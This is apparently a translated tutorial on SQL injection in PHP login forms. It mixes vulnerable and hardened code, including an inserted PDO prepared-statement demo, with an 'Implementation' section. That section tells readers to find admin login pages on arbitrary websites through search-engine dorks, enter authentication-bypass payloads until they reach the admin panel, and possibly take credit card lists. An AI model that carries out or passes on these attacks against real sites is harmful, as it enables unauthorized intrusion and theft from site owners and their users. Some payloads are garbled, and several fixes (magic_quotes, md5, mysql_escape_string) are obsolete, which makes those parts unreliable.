
Tutorial SQL Injection - Part 1

Definition of SQL Injection
  • SQL injection is a hacking action performed from the client application by modifying the SQL command that is held in the memory of the client application.
  • SQL injection is a technique for exploiting web applications that use a database for data storage.

The cause of SQL Injection

  • The absence of handling for the single-quote character ' and the double-minus character --, which allows SQL commands to be inserted into an application.
  • So a hacker inserts SQL commands into a parameter or a form.

Is the SQL Injection Bug Dangerous?
  1. This technique allows someone to log into the system without having an account.
  2. In addition, SQL injection allows someone to change, delete, and add data that resides in the database.
  3. Even more dangerous, it can shut down the database itself, so that it can no longer provide services to the web server.
What Does It Take to Perform SQL Injection?
  1. Internet Explorer / browser
  2. A PC connected to the Internet
  3. Programs or software such as SoftICE
Examples of SQL syntax in PHP
  • $SQL = "select * from login where username = '$username' and password = '$password'"; {from a GET or POST variable}
  • Fill in the password with the string ' or ''='
  • The result will then look like this: $SQL = "select * from login where username = '$username' and password = 'pass' or ''=''"; {with this SQL, the selection result will always be TRUE}
  • In this way SQL syntax (in this case OR) can be injected into the SQL statement
Handling SQL Injection
  1. Changing the PHP script
  2. Using mysql_escape_string
  3. Filtering the ' character by modifying php.ini
1. Changing the PHP script
Example of the original PHP script:
    // Vulnerable: $email and $password are placed in the SQL text unescaped
    $query = "select id, name, email, password, type, blocks from user " .
             "where email = '$email' and password = '$password'";
    $result = mysql_query($query, $id_mySQL);
    while ($row = mysql_fetch_row($result))
    {
        $id = $row[0];
        $name = $row[1];
        $email = $row[2];
        $password = $row[3];
        $type = $row[4];
        $block = $row[5];
    }
    if (strcmp($block, 'yes') == 0)
    {
        echo "<script>alert('Your account has been blocked');
        document.location.href = 'index.php';</script>\n";
        exit();
    }
    // Login is accepted as soon as the query returned any row
    else if (!empty($id) && !empty($name) && !empty($email) && !empty($password));

This script allows someone to log in by inserting SQL commands into the login form. When a hacker enters the characters ' or ''=' into the email and password fields of the form, it will form a query as follows:

So change the script to:
    // The password is no longer part of the SQL text; it is compared in PHP.
    // $email is still concatenated here; see mysql_escape_string below.
    $query = "select id, name, email, password, type, blocks from user " .
             "where email = '$email'";
    $result = mysql_query($query, $id_mySQL);
    while ($row = mysql_fetch_row($result))
    {
        $id = $row[0];
        $name = $row[1];
        $db_email = $row[2];      // kept separate so the submitted values are not overwritten
        $db_password = $row[3];   // stored MD5 hash
        $type = $row[4];
        $block = $row[5];
    }
    $pass = md5($password);       // hash of the submitted password
    if (strcmp($block, 'yes') == 0)
    {
        echo "<script>alert('Your account has been blocked');
        document.location.href = 'index.php';</script>\n";
        exit();
    }
    else if ((strcmp($email, $db_email) == 0) && (strcmp($pass, $db_password) == 0));


2. Using mysql_escape_string
This changes the ' character in a string into \', e.g. SQL injec'tion becomes SQL injec\'tion
Example:
    $kar = "SQL injec'tion";
    $filter = mysql_escape_string($kar);
    echo "Results of the filter: $filter";

3. Filtering the ' character by modifying php.ini
The modification is made by enabling the magic_quotes variable in php.ini, which causes the ' character in a string to be changed to \' automatically by PHP
example:

Example script that limits the characters that can be entered:
    function validatepassword(input)
        ' Only the letters listed here are accepted
        good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
        validatepassword = true
        for i = 1 to len(input)
            c = mid(input, i, 1)
            if (InStr(good_password_chars, c) = 0) then
                validatepassword = false
                exit function
            end if
        next
    end function
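
An added example, not code from the original post: the page's login query built by concatenation next to the same check done with a PDO prepared statement, both run against the ' or ''=' input described above. The in-memory SQLite database (which needs the pdo_sqlite extension), the table contents and the function names are assumptions made for the demo; password_hash() stands in for the page's md5(), and the prepared statement replaces mysql_escape_string and magic_quotes, which current PHP versions no longer provide.

```php
<?php
// Constructed demo data in an in-memory SQLite database (assumption, not from the page).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// "password" holds plain text only so the page's original query can run;
// "password_hash" is what the hardened version checks.
$db->exec("CREATE TABLE login (username TEXT PRIMARY KEY, password TEXT, password_hash TEXT)");
$db->prepare("INSERT INTO login VALUES (?, ?, ?)")
   ->execute(['admin', 's3cret-demo', password_hash('s3cret-demo', PASSWORD_DEFAULT)]);

// Vulnerable form from the page: input is concatenated into the SQL text, so a
// quote in $password ends the string literal and the rest is parsed as SQL.
function login_concatenated(PDO $db, string $username, string $password): bool
{
    $sql = "select * from login where username = '$username' and password = '$password'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened form: the statement text is fixed, the user name is bound as data,
// and the password is verified in PHP against the stored hash.
function login_prepared(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare("select password_hash from login where username = ?");
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($password, $hash);
}

// Constructed inputs: a valid login, a wrong password, and the page's quote string.
$cases = [
    'correct password'    => ['admin', 's3cret-demo'],
    'wrong password'      => ['admin', 'guess'],
    "page's quote string" => ['admin', "' or ''='"],
];
foreach ($cases as $label => [$user, $pass]) {
    printf("%-20s concatenated=%-5s prepared=%s\n", $label,
        var_export(login_concatenated($db, $user, $pass), true),
        var_export(login_prepared($db, $user, $pass), true));
}
```

Only the concatenated version accepts the quote string, because there the input changes the WHERE clause itself; in the prepared version it is compared as an ordinary (wrong) password.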

Implementation of SQL Injection
  1. Go to Google or another search engine
  2. Enter one of the following keywords
    "/ admin.asp"
    "/ login.asp"
    "/ logon.asp"
    "/ adminlogin.asp"
    "/ adminlogon.asp"
    "/ admin_login.asp"
    "/ admin_logon.asp"
    "/ admin / admin.asp"
    "/ admin / login.asp"
    "/ admin / logon.asp"
    {you can add to your own as desired}
  3. Open any of the links found by Google; chances are you will see a login page (user name and password).

  4. Enter the following code:
    User name: `or` a '=' a
    Password: `or` a '=' a (including the quotation marks)

  5. If successful, chances are you will get into the admin panel, where you can add news, edit other user accounts, change about,
    and others. If you are lucky you can get a list of credit cards that much.

  6. If it does not work, try searching for another link found by google.

  7. Many variations of the code are possible, among others:
    User name: admin
    Password: `or` a '=' a
    or both can be combined, e.g.:
    'Or 0 = 0 -; "or 0 = 0 -; or 0 = 0 -;' or 0 = 0 #;
    "Or 0 = 0 #; 'or'x' = 'x;" or "x" = "x;') or ('x' = 'x')

Try to succeed until you can get into the admin panel

How to Prevent SQL Injection
  1. Limit the length of the input box (if possible) by restricting it in the program code, so that beginner crackers will be confused for a moment when they find that the input box cannot be injected with a long command.

  2. Filter the input entered by the user, especially single quotation marks (input validation).

  3. Turn off or hide the error messages produced by the running SQL Server.

  4. Turn off standard facilities such as Stored Procedures and Extended Stored Procedures if possible.

  5. Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.

Hacking is art. Hacking is a blend of knowledge, creativity and patience. If you have all three you will succeed.
